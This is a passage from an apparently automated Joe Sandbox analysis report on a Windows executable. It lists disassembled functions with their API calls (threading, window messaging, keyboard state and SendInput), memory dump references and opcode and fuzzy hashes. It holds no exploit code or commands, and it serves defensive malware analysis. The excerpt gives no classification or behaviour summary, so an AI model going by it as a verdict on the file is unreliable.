• SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
• SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID: Msctls_Progress32
                                                                                                • API String ID: 3850602802-3636473452
                                                                                                • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                                                • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                                                • String ID:
                                                                                                • API String ID: 3985565216-0
                                                                                                • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                                • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                                                                • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                                • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 0041F707
                                                                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                • _free.LIBCMT ref: 0041F71A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap_free_malloc
                                                                                                • String ID: [B
                                                                                                • API String ID: 1020059152-632041663
                                                                                                • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                                • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                                                • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                                • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                                                APIs
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                                                • __calloc_crt.LIBCMT ref: 00413DB0
                                                                                                • __getptd.LIBCMT ref: 00413DBD
                                                                                                • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                                                • _free.LIBCMT ref: 00413E07
                                                                                                • __dosmaperr.LIBCMT ref: 00413E12
                                                                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                • String ID:
                                                                                                • API String ID: 155776804-0
                                                                                                • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                                • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                                                • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                                • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                                                APIs
                                                                                                  • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                                                  • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                                                • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                • String ID:
                                                                                                • API String ID: 1957940570-0
                                                                                                • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                                                • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                                                APIs
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                • __freefls@4.LIBCMT ref: 00413D74
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                • String ID:
                                                                                                • API String ID: 259663610-0
                                                                                                • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                                                • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                                                APIs
                                                                                                • GetClientRect.USER32(?,?), ref: 004302E6
                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                                                • GetClientRect.USER32(?,?), ref: 00430364
                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                                                • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                                                • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                • String ID:
                                                                                                • API String ID: 3220332590-0
                                                                                                • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                                                • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                • String ID:
                                                                                                • API String ID: 1612042205-0
                                                                                                • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                                • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                                                • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                                • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove_strncmp
                                                                                                • String ID: >$U$\
                                                                                                • API String ID: 2666721431-237099441
                                                                                                • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                                                • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                                                APIs
                                                                                                • GetKeyboardState.USER32(?), ref: 0044C570
                                                                                                • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                                                • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                                                • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                                                • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePost$KeyboardState$InputSend
                                                                                                • String ID:
                                                                                                • API String ID: 2221674350-0
                                                                                                • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                                                • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcscpy$_wcscat
                                                                                                • String ID:
                                                                                                • API String ID: 2037614760-0
                                                                                                • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                                • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                                                • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                                • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Variant$Copy$AllocClearErrorLastString
                                                                                                • String ID:
                                                                                                • API String ID: 960795272-0
                                                                                                • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                                                • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                                                APIs
                                                                                                • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                                                • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                • String ID:
                                                                                                • API String ID: 4189319755-0
                                                                                                • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                                                • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                                                • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                                                • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                • String ID:
                                                                                                • API String ID: 1976402638-0
                                                                                                • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                                                • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                                                APIs
                                                                                                • ShowWindow.USER32(?,00000000), ref: 00440A8A
